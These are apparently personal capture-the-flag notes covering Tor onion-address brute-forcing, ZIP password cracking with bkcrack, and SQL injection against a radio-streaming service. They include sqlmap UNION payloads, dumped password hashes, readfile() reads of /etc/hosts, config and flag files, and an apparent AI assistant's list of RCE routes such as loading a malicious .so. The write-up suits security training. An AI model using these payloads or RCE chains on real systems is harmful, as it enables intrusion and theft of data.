fyx(me)

// this was the scoreboard when I started

chall 1

// actually not sure what I had to do but need to check where that cookie was set because I think that unlocked it

// maybe didnt visit enough/all pages or red the rules or something? also seems like it only works once per session token

59bd34cc-0125-47f8-8a91-a18bce1780b9

// get user credentials and access the wordpress website or something and get RCE from there? // maybe another way with a .git repo

https://shop.ulmageddon.com/index.php?id_category=13&controller=category idor probs

chall 2

http://beanbeatbzewmkbp3tdjuclubgl3lwrwxknuuznrkk57t46dba 

.onion

V3 onion addresses are 56 characters long, and use characters a-z and 2-7

50 chars - beanbeatbzewmkbp3tdjuclubgl3lwrwxknuuznrkk57t46dba

32**6 - 1073741824

Within the darknet – the soul decays
urm link rot?

https://github.com/torproject/torspec/blob/main/rend-spec-v3.txt

https://spec.torproject.org/rend-spec/encoding-onion-addresses.html

https://openrouter.ai/chat?room=orc-1759072747-8iPXY6TBLg2gpN2mqHIm

https://chatgpt.com/c/68d95a5b-87e4-8330-a80d-5a5789c1c78c

import base64
import hashlib
from itertools import product

# Constants for checksum calculation (per Tor spec).
ONION_SUFFIX = ".onion"                # keep as str for final assembly
CHECKSUM_MAGIC = b".onion checksum"
VERSION_BYTE = b"\x03"                 # For v3 onion services

# Base32 alphabet for generating candidate chars.
BASE32_CHARS = "abcdefghijklmnopqrstuvwxyz234567"

# Your known partial public key (base32, 50 characters).
KNOWN_PUBKEY_PREFIX = "beanbeatbzewmkbp3tdjuclubgl3lwrwxknuuznrkk57t46dba"

def compute_tor_checksum(public_key_bytes: bytes) -> bytes:
    """
    CHECKSUM = SHA3_256(".onion checksum" | PUBKEY | VERSION)[:2]
    """
    data = CHECKSUM_MAGIC + public_key_bytes + VERSION_BYTE
    return hashlib.sha3_256(data).digest()[:2]

def base32_decode_nopad(s: str) -> bytes:
    """
    Decode a base32 string that may be missing '=' padding and may be lowercase.
    """
    # Pad to a multiple of 8 chars as required by standard base32
    pad_len = (-len(s)) % 8
    return base64.b32decode(s + ("=" * pad_len), casefold=True)

def candidate_generator(known_prefix: str, missing_chars_count: int):
    """
    Yield candidate public keys by appending missing characters.
    """
    if missing_chars_count <= 0:
        yield known_prefix
        return
    # Using itertools.product is simpler/faster than recursion
    for tail in product(BASE32_CHARS, repeat=missing_chars_count):
        yield known_prefix + "".join(tail)

def main():
    # For a full v3 public key (52 base32 chars), we assume 2 are missing.
    missing_chars_count = 2

    for candidate_base32 in candidate_generator(KNOWN_PUBKEY_PREFIX, missing_chars_count):
        # Sanity check: v3 pubkey part should be 52 chars
        if len(candidate_base32) != 52:
            continue

        # Decode the 52-char base32 pubkey into 32 bytes
        pubkey_bytes = base32_decode_nopad(candidate_base32)

        # Compute the checksum for the candidate public key
        checksum_bytes = compute_tor_checksum(pubkey_bytes)

        # Base32-encode checksum+version, lowercase it, and strip '=' padding
        full_checksum = base64.b32encode(checksum_bytes + VERSION_BYTE)\
                              .decode("ascii").lower().rstrip("=")

        # Assemble the final full onion address (56 base32 chars + ".onion")
        full_onion_address = f"{candidate_base32}{full_checksum}{ONION_SUFFIX}"
        print(f"Candidate address: {full_onion_address}")

if __name__ == "__main__":
    main()

python3 test.py | wc                                                                                                                                                                      lo at kali
   1024    3072   84992

curl --proxy socks5h://localhost:9050 -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 'http://bellcatmbguthn3age23lrbseln2lryzv3mt7whis7ktjw4qrestbzad.onion/'  -v



// this one gets stuck which is interesting... for 44 seconsd
beanbeatbzewmkbp3tdjuclubgl3lwrwxknuuznrkk57t46dba7attyd.onion


https://onion.ail-project.org/apiman/swagger/#/lookup/head_api_lookup__onion_

curl --socks5-hostname 127.0.0.1:9050 http://beanbeatbzewmkbp3tdjuclubgl3lwrvvxknuuznrkk57t46dba2ivad.onion  -v | tee out.txt

beanbeatbzewmkbp3tdjuclubgl3lwrvvxknuuznrkk57t46dba2ivad.onion

files are pretty big:

0b - /samples/internal_emails.txt (404)
735M - /samples/homefolder.zip
40GB - ed7b0c9128396aafeea0c20ce4932944866e1391.zip

We can speed up download using torget:

https://github.com/mtrojnar/torget

# getting about 5MB/s on default settings for homefolder.zip
./torget-linux http://beanbeatbzewmkbp3tdjuclubgl3lwrvvxknuuznrkk57t46dba2ivad.onion/samples/homefolder.zip
Output file: homefolder.zip
Download length: 771503755 bytes
100.00% done, stalled
Download complete

$ 7zz l homefolder.zip  | head -30

7-Zip (z) 22.01 (x64) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15
 64-bit locale=en_US.UTF-8 Threads:2

Scanning the drive for archives:
1 file, 771503755 bytes (736 MiB)

Listing archive: homefolder.zip

--
Path = homefolder.zip
Type = zip
Physical Size = 771503755

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2025-04-28 06:20:02 D....            0            0  susanne.berger
2025-04-28 06:12:35 D....            0            0  susanne.berger/.ms-ad
2025-04-28 04:24:11 D....            0            0  susanne.berger/.ssh
2025-04-28 04:18:36 ....A          464          365  susanne.berger/.ssh/id_ed25519
2025-04-28 04:18:36 ....A          112          124  susanne.berger/.ssh/id_ed25519.pub
2025-04-28 04:24:11 ....A         3326         2554  susanne.berger/.ssh/id_rsa
2025-04-28 04:24:11 ....A          764          625  susanne.berger/.ssh/id_rsa.pub
2025-04-28 06:20:27 D....            0            0  susanne.berger/.VirtualBox
2025-04-28 06:21:23 ....A         1426          672  susanne.berger/.VirtualBox/selectorwindow.log
2025-04-28 06:27:30 ....A        14617         2520  susanne.berger/.VirtualBox/VBoxSVC.log
2025-04-28 06:20:27 ....A         2431          979  susanne.berger/.VirtualBox/VirtualBox.xml
2025-04-28 06:20:27 ....A         2328          965  susanne.berger/.VirtualBox/VirtualBox.xml-prev
2025-04-28 04:07:14 DR...            0            0  susanne.berger/3D Objects
2025-04-28 04:07:14 ..HSA          298          172  susanne.berger/3D Objects/desktop.ini


$ 7zz l homefolder.zip  | grep flag
2025-04-28 10:36:22 ....A          951          552  susanne.berger/AppData/Roaming/Microsoft/Windows/Recent/flag.lnk
2025-04-28 09:33:06 ....A           55           67  susanne.berger/Desktop/flag.txt


# file is password protected... 

7zz x ../homefolder.zip

7-Zip (z) 22.01 (x64) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15
 64-bit locale=en_US.UTF-8 Threads:2

Scanning the drive for archives:
1 file, 771503755 bytes (736 MiB)

Extracting archive: ../homefolder.zip
--
Path = ../homefolder.zip
Type = zip
Physical Size = 771503755


Enter password (will not be echoed):

# retrieving hash using zip2hashcat - https://github.com/hashstation/zip2hashcat

$ ./zip2hashcat ../homefolder.zip
[...]
$pkzip$8*1*1*0*0*10*eced*ed77d627168c8952e1b8109ab8418d02*1*0*0*10*eced*cfca411271384a06763d549b0fe8895d*1*0*0*10*eced*889f31f2b5d79fab20973f57e2ca14ed*1*0*0*10*fdfc*0c1a09ab67973a36262aa160d311fa57*1*0*0*10*eced*8e7a2a57cfd05ff8caa8580776896444*1*0*0*10*eced*cb5f89fe58534ca490d620d00b7fea70*1*0*0*10*ff41*f885b3bfb861a42090878015a1083bf8*2*0*10*4*2144df1c*e085*61*0*10*2144*7a60d99dda317c2661930f9ffc0b4ea9*$/pkzip$


susanne.berger/Downloads/KeePass-2.58/License.txt

https://sourceforge.net/projects/keepass/files/KeePass%202.x/2.58/

bkcrack -C test.zip -c test.txt -p pl.txt


https://github.com/Brunnerne/bkwhack


$ python3 bkwhack.py ~/shared/homefolder.zip  

[...]

[*] Attempting key recovery for 'susanne.berger/AppData/Local/Microsoft/Office/SolutionPackages/846a9aaaecf2e3827bd566cee21be5a1/PackageResources/msft.png':

./bkcrack -C /home/lo/shared/homefolder.zip -c susanne.berger/AppData/Local/Microsoft/Office/SolutionPackages/846a9aaaecf2e3827bd566cee21be5a1/PackageResources/msft.png -x 0 89504e470d0a1a0a0000000d49484452 -x 234 0000000049454e44ae426082

Keys: eb344058 ae57e975 193a7c0b

[+] Keys successfully recovered: eb344058 ae57e975 193a7c0b

[*] Generating unencrypted output archive 'decrypted.zip'...

./bkcrack -C /home/lo/shared/homefolder.zip -k eb344058 ae57e975 193a7c0b -D decrypted.zip

[+] Unencrypted archive successfully generated!

./bkcrack -C /home/lo/shared/homefolder.zip -k eb344058 ae57e975 193a7c0b -D decrypted.zip

7z e -so ./decrypted.zip susanne.berger/Desktop/flag.txt                                                                                                lo at kali (--)(main)
FLAG{WithinTheDarknet#de3e37eeb61ab078d66bac75045f44c4}

chall 3

lol: https://github.com/autenticalia/jchall

https://github.com/moshzilla?tab=overview&from=2025-03-01&to=2025-03-31

https://github.com/MoshZillaRadio/moshcast https://github.com/MoshZillaRadio/go-sqlite3-ext

.../qwer/asdf/moshcast > gitleaks detect .                                                          lo at kali (main)

    ○
    │╲
    │ ○
    ○ ░
    ░    gitleaks

10:04PM INF 2 commits scanned.
10:04PM INF scan completed in 62.9ms
10:04PM INF no leaks found
.../qwer/asdf/moshcast > cd ../go-sqlite3-ext                                                       lo at kali (main)
.../qwer/asdf/go-sqlite3-ext > gitleaks detect .                                                    lo at kali (main)

    ○
    │╲
    │ ○
    ○ ░
    ░    gitleaks

10:04PM INF 4 commits scanned.
10:04PM INF scan completed in 72.2ms
10:04PM INF no leaks found
.../qwer/asdf/go-sqlite3-ext >

// sql injection // mosh.sql

rg "SelectMetaData"                                                        lo at kali (main)
mosh/handlers.go
38:	data := s.SQL.SelectMetaData(s.Database, dateParam)

mosh/sql.go
71:func (s *SQL) SelectMetaData(db *sql.DB, date string) []MetaEntry {

// metaHandler renders the meta page
func (s *Server) metaHandler(w http.ResponseWriter, r *http.Request) {
        dateParam := r.URL.Query().Get("date")
        if len(dateParam) == 0 {
                dateParam = "2025-03-03"
        }
        data := s.SQL.SelectMetaData(s.Database, dateParam)
        s.renderPage(w, "templates/meta.gohtml", data)
}

> rg "metaHandler"                                                           lo at kali (main)
mosh/handlers.go
32:// metaHandler renders the meta page
33:func (s *Server) metaHandler(w http.ResponseWriter, r *http.Request) {

mosh/server.go
105:	r.HandleFunc("/meta.json", i.metaHandler).Methods("GET")

rg "FLAG"                                                                                                                                            kingjulien at central-park-zoo (main)
src/fileio.c
486:        FILE_FLAG_BACKUP_SEMANTICS, NULL); /* FLAG{RepoOfWrath# */

FILE_FLAG_BACKUP_SEMANTICS, NULL); /* FLAG{RepoOfWrath# */
sqlite3_free(zUnicodeName);            /* 24717823c8dabce1ebd9929a5008fbf3} */

FLAG{RepoOfWrath#24717823c8dabce1ebd9929a5008fbf3}

rg "moshzilla"                                                                                                                                                                                     lo at kali (main)
docker-compose.yml
3:    image: moshzillaradio/moshcast

https://hub.docker.com/r/moshzillaradio/moshcast

run it locally:

docker run --rm -it moshzillaradio/moshcast bash

# outside container

ls -al data/data.db                lo at kali (main)
-rw-rw-r-- 1 lo lo 20480 Sep 28 22:02 data/data.db

sha256sum data/data.db
a8701199f1e873c17cc27394a3117b84e47bfe66cda5f0a2ffe695ec60962720  data/data.db


----

# in container

/app # ls -al data/data.db
-rw-r--r--    1 root     root     130101248 Mar 20  2025 data/data.db

sha256sum data/data.db
dfc0c818196dffa7ade56d62d51ba15fea97c20809517ab2a2bbd6ce40ff45fb  data/data.db

docker ps                                                                                                                                                                                          lo at kali (main)
CONTAINER ID   IMAGE                     COMMAND     CREATED         STATUS         PORTS     NAMES
c69dc5996350   moshzillaradio/moshcast   "/bin/sh"   7 minutes ago   Up 7 minutes             exciting_montalcini

docker cp c69dc5996350:/app/data/data.db container-data.db
Successfully copied 130MB to /tmp/qwer/asdf/moshcast/container-data.db

SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
meta   users
sqlite> .schema users
CREATE TABLE users (
		id INTEGER PRIMARY KEY AUTOINCREMENT,
		username TEXT UNIQUE,
		password TEXT,
		salt TEXT
	);
sqlite> select * from users;
sqlite> select count(*) from users;
0
sqlite> .meta
Error: unknown command or invalid arguments:  "meta". Enter ".help" for help
sqlite> .schema meta
CREATE TABLE meta (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                title TEXT,
                date DATETIME DEFAULT CURRENT_TIMESTAMP
        );
sqlite> select * from meta;
sqlite>

.../qwer/asdf/moshcast > binwalk container-data.db                                                                                                                                                                       lo at kali (-)(main)

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             SQLite 3.x database,
37515668      0x23C7194       JBOOT STAG header, image id: 0, timestamp 0x2C240000, image size: 757334016 bytes, image JBOOT checksum: 0x0, header JBOOT checksum: 0x2E24

.../qwer/asdf/moshcast > binwalk data/data.db            lo at kali (-)(main)

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             SQLite 3.x database,

binwalk -e ../container-data.db                                                                                                                                                                  lo at kali (-)(main)

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------

WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

----

binwalk --dd='.*' ../container-data.db    


-----

file 23C7194                                                                                                                                                             lo at kali (-)(main)
23C7194: Adobe Photoshop Color swatch, version 0, 9259 colors; 1st RGB space (0), w 0x242c, x 0, y 0x242d, z 0; 2nd space (9262), w 0, x 0x242f, y 0, z 0x2430
.../moshcast/out/_container-data.db.extracted > file 0                                                                                                                                                                   lo at kali (-)(main)
0: SQLite 3.x database, last written using SQLite version 3046001, writer version 2, read version 2, file counter 2095, database pages 31763, 1st free page 31533, free pages 31758, cookie 0x6, schema 4, UTF-8, version-valid-for 2095

nmap didnt return anything

https://ulmageddon.com/

<!-- <source src="http://46.101.222.148:8000/UlmAgeddon" type="audio/mpeg"> -->

http://46.101.222.148:8080/info

# mosh/server.go

func (i *Server) configureRouter() *mux.Router {
	r := mux.NewRouter()
	r.Use(i.middlewareHandler)
	r.StrictSlash(true)

	for _, mnt := range i.Options.Mounts {
		r.HandleFunc("/"+mnt.Name, mnt.write).Methods("SOURCE", "PUT")
		r.HandleFunc("/"+mnt.Name, mnt.read).Methods("GET")
		r.Path("/admin/metadata").Queries("mode", "updinfo", "mount", "/"+mnt.Name).HandlerFunc(mnt.meta).Methods("GET")
	}

	r.HandleFunc("/meta.json", i.metaHandler).Methods("GET")
	r.HandleFunc("/info", i.infoHandler).Methods("GET")
	r.HandleFunc("/info.json", i.jsonHandler).Methods("GET")
	r.PathPrefix("/").Handler(NewFsHook(i.Options.Paths.Web))

	return r
}

sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf"                                                                                                                                       lo at kali (-)(main)
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.6#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:02:54 /2025-09-29/

[01:02:54] [INFO] testing connection to the target URL
[01:02:55] [INFO] testing if the target URL content is stable
[01:02:55] [INFO] target URL content is stable
[01:02:55] [INFO] testing if GET parameter 'date' is dynamic
[01:02:55] [WARNING] GET parameter 'date' does not appear to be dynamic
[01:02:55] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[01:02:55] [INFO] testing for SQL injection on GET parameter 'date'
[01:02:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:02:58] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:02:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:02:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:03:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[01:03:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:03:02] [INFO] testing 'Generic inline queries'
[01:03:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:03:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[01:03:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[01:03:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:03:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:03:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:03:08] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[01:03:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:03:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:03:15] [INFO] target URL appears to have 2 columns in query
[01:03:15] [WARNING] applying generic concatenation (CONCAT)
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]

[01:03:25] [INFO] GET parameter 'date' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[01:03:25] [INFO] checking if the injection point on GET parameter 'date' is a false positive
GET parameter 'date' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 92 HTTP(s) requests:
---
Parameter: date (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: date=asdf' UNION ALL SELECT CONCAT(CONCAT('qjppq','BuHKQYTbNQNYTcRYKLLbZZmLZRQFiZHTSpPnvNCl'),'qqpjq'),59-- ZNmU
---
[01:03:33] [INFO] testing MySQL
[01:03:34] [WARNING] the back-end DBMS is not MySQL
[01:03:34] [INFO] testing Oracle
[01:03:34] [WARNING] the back-end DBMS is not Oracle
[01:03:34] [INFO] testing PostgreSQL
[01:03:34] [WARNING] the back-end DBMS is not PostgreSQL
[01:03:34] [INFO] testing Microsoft SQL Server
[01:03:34] [WARNING] the back-end DBMS is not Microsoft SQL Server
[01:03:34] [INFO] testing SQLite
[01:03:34] [INFO] confirming SQLite
[01:03:35] [INFO] actively fingerprinting SQLite
[01:03:35] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[01:03:35] [INFO] fetched data logged to text files under '/home/lo/.local/share/sqlmap/output/46.101.222.148'

[*] ending @ 01:03:35 /2025-09-29/

.../asdf/moshcast/out > sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" -a                                                                                                                                    lo at kali (-)(main)
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:04:45 /2025-09-29/

[01:04:45] [INFO] resuming back-end DBMS 'sqlite'
[01:04:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: date (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: date=asdf' UNION ALL SELECT CONCAT(CONCAT('qjppq','BuHKQYTbNQNYTcRYKLLbZZmLZRQFiZHTSpPnvNCl'),'qqpjq'),59-- ZNmU
---
[01:04:46] [INFO] the back-end DBMS is SQLite
[01:04:46] [INFO] fetching banner
back-end DBMS: SQLite
banner: '3.46.1'
[01:04:46] [WARNING] on SQLite it is not possible to enumerate the current user
[01:04:46] [WARNING] on SQLite it is not possible to get name of the current database
[01:04:46] [WARNING] on SQLite it is not possible to enumerate the hostname
[01:04:46] [WARNING] on SQLite the current user has all privileges
current user is DBA: True
[01:04:46] [WARNING] on SQLite it is not possible to enumerate the users
[01:04:46] [WARNING] on SQLite it is not possible to enumerate the user password hashes
[01:04:46] [WARNING] on SQLite it is not possible to enumerate the user privileges
[01:04:46] [WARNING] on SQLite the concept of roles does not exist. sqlmap will enumerate privileges instead
[01:04:46] [WARNING] on SQLite it is not possible to enumerate the user privileges
[01:04:46] [INFO] sqlmap will dump entries of all tables from all databases now
[01:04:46] [INFO] fetching tables for database: 'SQLite_masterdb'
[01:04:46] [INFO] fetching columns for table 'sqlite_sequence'
[01:04:46] [INFO] fetching entries for table 'sqlite_sequence'
Database: <current>
Table: sqlite_sequence
[1 entry]
+-----+-------+
| seq | name  |
+-----+-------+
| 7   | users |
+-----+-------+

[01:04:46] [INFO] table 'SQLite_masterdb.sqlite_sequence' dumped to CSV file '/home/lo/.local/share/sqlmap/output/46.101.222.148/dump/SQLite_masterdb/sqlite_sequence.csv'
[01:04:46] [INFO] fetching columns for table 'users'
[01:04:46] [INFO] fetching entries for table 'users'
Database: <current>
Table: users
[7 entries]
+----+----------+--------------------------------------------------------------+----------------------------------+
| id | salt     | password                                                     | username                         |
+----+----------+--------------------------------------------------------------+----------------------------------+
| 1  | 13377907 | $2a$10$LY2krw5aWn45izVmIYzcOOPnUWwfXb61rgbnTuasSupAl/CZki0Vm | mlehmann@moshzilla.rocks         |
| 2  | 13374557 | $2a$10$OZxZoLUitsXtWgcfYAT0ueX3.F6jTG4BcqK3Ko6apCrGCyUn7vCu2 | jbrandt@moshzilla.rocks          |
| 3  | 13372567 | $2a$10$7TV7I8khvPg0S3YTbnRujehUBBKW2TWCb.5i0ZDEDYn6Bscuvtb1G | jweber@moshzilla.rocks           |
| 4  | 13373146 | $2a$10$V/0dpUqsmWeVaJpuwO9Mcui7KJR4/EcgksjhOr5cJB8ijrBnDozaK | lschroeder@moshzilla.rocks       |
| 5  | 13374822 | $2a$10$u1VIriWaBfaUedGXLYWM4OBbEqER2WouwpfpbNS.KlT7yf477Eud. | tneumann@moshzilla.rocks         |
| 6  | 13375079 | $2a$10$3t.UlvPVVXYdv7ScE8TBlO9YOU5aFe.Lch70Ds06A5CPqFhkdWvGm | ckoenig@moshzilla.rocks          |
| 7  | 13373683 | $2a$10$olXgAnM2AvhswolWCD7fqOjDQ261uFC5d7ZhE/FbB3FxupVuBKGeK | admin_ulmageddon@moshzilla.rocks |
+----+----------+--------------------------------------------------------------+----------------------------------+

[01:04:47] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/home/lo/.local/share/sqlmap/output/46.101.222.148/dump/SQLite_masterdb/users.csv'
[01:04:47] [INFO] fetching columns for table 'meta'
[01:04:47] [INFO] fetching entries for table 'meta'
[01:04:47] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[01:04:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:04:47] [WARNING] unable to retrieve the entries for table 'meta' in database 'SQLite_masterdb'
[01:04:47] [INFO] fetched data logged to text files under '/home/lo/.local/share/sqlmap/output/46.101.222.148'

[*] ending @ 01:04:47 /2025-09-29/

$ cat asdf.txt | egrep -o '\$[^ ]+' 
$2a$10$LY2krw5aWn45izVmIYzcOOPnUWwfXb61rgbnTuasSupAl/CZki0Vm
$2a$10$OZxZoLUitsXtWgcfYAT0ueX3.F6jTG4BcqK3Ko6apCrGCyUn7vCu2
$2a$10$7TV7I8khvPg0S3YTbnRujehUBBKW2TWCb.5i0ZDEDYn6Bscuvtb1G
$2a$10$V/0dpUqsmWeVaJpuwO9Mcui7KJR4/EcgksjhOr5cJB8ijrBnDozaK
$2a$10$u1VIriWaBfaUedGXLYWM4OBbEqER2WouwpfpbNS.KlT7yf477Eud.
$2a$10$3t.UlvPVVXYdv7ScE8TBlO9YOU5aFe.Lch70Ds06A5CPqFhkdWvGm
$2a$10$olXgAnM2AvhswolWCD7fqOjDQ261uFC5d7ZhE/FbB3FxupVuBKGeK

can you explain the following repo and how it saves files to sqlite (if it does)

> I’ll scan the repository structure and key files to understand its purpose and how it interacts with SQLite. Then I’ll trace any write paths that might save files or blobs.

• Explored
  └ List ls -la
    Read README.md, ext.go, ext_test.go, CMakeLists.txt, fileio.c

> Overview

  - Purpose: Adds SQLite file I/O utilities (read/write files, list directories) by loading a native SQLite extension into the mattn/go-sqlite3 driver.
  - Key point: It does not automatically “save files into SQLite”. It exposes SQL functions you can use to read files into the DB or write blobs from the DB out to the filesystem.

  Components

  - ext.go: Registers driver sqlite3-ext and loads shared library libgo-sqlite3-ext.so via LoadExtension("sqlite3_fileio_init").
  - src/fileio.c: SQLite extension implementing readfile(), writefile(), and the fsdir virtual table. Based on SQLite’s “fileio” extension.
  - CMakeLists.txt: Builds go-sqlite3-ext shared library (install name becomes libgo-sqlite3-ext.so).
  - ext_test.go: Smoke test that sql.Open("sqlite3-ext", ":memory:") loads the extension.

  What the extension provides

  - readfile(path): Returns the file at path as a BLOB (or NULL if unreadable).
  - writefile(path, data[, mode[, mtime]]): Writes data to filesystem path. Optionally sets POSIX mode and modification time.
  - fsdir(path[, dir]): Table-valued function listing files under path (columns: name, mode, mtime, data). For regular files, data is the file content blob; for symlinks, link text; for dirs, NULL.

  Does it save files to SQLite?

  - Not by itself. The extension allows you to move data between the filesystem and SQLite via SQL, but it doesn’t auto-ingest or auto-persist files.
  - How to save into SQLite: Use readfile() in an INSERT/UPDATE to store file bytes in your tables.
      - Example: INSERT INTO files(name, data) VALUES ('foo.png', readfile('/path/foo.png'));
  - How to write from SQLite to disk: Use writefile() with a blob selected from your DB.
      - Example: SELECT writefile('/out/foo.png', data) FROM files WHERE name='foo.png';

  Usage examples

  - Import a directory tree into a table:
      - INSERT INTO files(name, mode, mtime, data) SELECT name, mode, mtime, data FROM fsdir('/some/dir');
  - Export from a table back to the filesystem:
      - SELECT writefile('/restore/' || name, data, mode, mtime) FROM files;
  - Read a single file into a query result:
      - SELECT readfile('/etc/hosts');

  Build and use

  - Build and install the shared library:
      - mkdir build && cd build && cmake .. && make && make install
  - Open with the driver that loads the extension:
      - Go: db, _ := sql.Open("sqlite3-ext", "file:app.db?_busy_timeout=5000")
  - Ensure the loader can find libgo-sqlite3-ext.so (e.g., installed to a standard lib path or set LD_LIBRARY_PATH).

  Notes

  - readfile, writefile are created with SQLITE_DIRECTONLY for safety (callable in top-level SQL, not from triggers/views).
  - Using writefile() writes to the OS filesystem, not into the database.
  - If the library isn’t found, the driver returns ErrNotFound during connect.
Token usage: total=13839 input=11695 (+ 77568 cached) output=2144 (reasoning 1024)

fetching SQL SELECT statement query output: 'select readfile('/etc/hosts')'
select readfile('/etc/hosts'): '# Your system has configured 'manage_etc_hosts' as True.\n# As a result, if you wish for changes to this file to persist\n# then you will need to either\n# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl\n# b.) change or remove the value of 'manage_etc_hosts' in\n#     /etc/cloud/cloud.cfg or cloud-config from user-data\n#\n127.0.1.1 moshcast moshcast\n127.0.0.1 localhost\n\n# The following lines are desirable for IPv6 capable hosts\n::1 localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n\n'

select readfile('/app/config.yaml'): 'Name: Radio Station\nAdmin: admin@moshzilla.rocks\nLocation: Internet\nHost: 46.101.222.148\nSocket:\n  Port: 8080\n\nLimits:\n  Clients: 1000\n  Sources: 50\n  SourceIdleTimeOut: 10\n  EmptyBufferIdleTimeOut: 5\n  WriteTimeOut: 10\n\nAuth:\n  DBFile: data/data.db\n\nPaths:\n  Log: /tmp/\n  Web: html/\n  Plugins: plugins/\n\nLogging:\n  LogLevel: 4\n  LogSize: 50000\n  StatInterval: 5\n\nMounts:\n  - Name: UlmAgeddon\n    Genre: Death Metal, Black Metal, Thrash Metal\n    Description: UlmAgeddon 2025 - MoshZilla Radio Live\n    BitRate: 128\n    BurstSize: 65535\n    DumpFile:\n'

sql-shell> select readfile('/root/flag.txt');
[05:28:12] [INFO] fetching SQL SELECT statement query output: 'select readfile('/root/flag.txt')'
select readfile('/root/flag.txt'): 'FLAG{RitualOfFireAGateway....Oh damn it... it looks like we've lost the rest. In this case, a shell might help!}\n'

are there any functions which combined with file read or write could provide RCE

• Explored
  └ Read example.go, api.go

> Short answer: yes. There are clear RCE paths if an attacker can write files in specific places, combined with functions already present in your app.

  Direct Plugin Loading

  - Code: utils.LoadPlugins(server.Options.Paths.Plugins) in main.go, which calls plugin.Open and invokes Init().Process() for every .so in that directory (utils/utils.go).
  - RCE Combo: Any ability to write a .so file into Options.Paths.Plugins leads to immediate arbitrary code execution on the next startup (or restart) because the plugin’s Process() runs in-process.
  - Variants:
      - If an attacker can also change config.yaml to repoint Paths.Plugins to a writable location, that plus a restart yields RCE.
      - If an attacker can trigger a restart (e.g., by inducing a controlled panic), newly dropped plugins will be loaded next run.

  SQL From Templates → SQLite Extensions

  - Code: Templates are parsed with html/template, and when data == nil you pass the entire *Server into templates (handlers.go:renderPage). That exposes .Database (*sql.DB) and .SQL methods to templates.
  - Result: A malicious template can call DB APIs, e.g., {{ .Database.Exec "SQL..." }} → arbitrary SQL execution.
  - RCE Combo: With SQLite “ext” build (github.com/MoshZillaRadio/go-sqlite3-ext), if loadable extensions are enabled, arbitrary SQL can run:
      - SELECT load_extension('/path/to/evil.so'); → loads native code into the process → RCE.
      - If file I/O extension functions (e.g., writefile()) are available/loaded, SQL alone can write arbitrary files; combined with plugin loading on restart, that’s also RCE.
  - Note: Whether load_extension is enabled depends on how the driver is built/configured at runtime. The “ext” fork strongly suggests extension support; if it’s enabled, this path is viable.

  Other File-Write Adjacent Surfaces

  - mount.DumpFile: If an attacker can alter config to set DumpFile to a chosen path, then connect as a source, they can write arbitrary bytes to that file. Combined with the plugin loader (point Paths.Plugins or
  drop into plugins dir), this can yield RCE on restart.
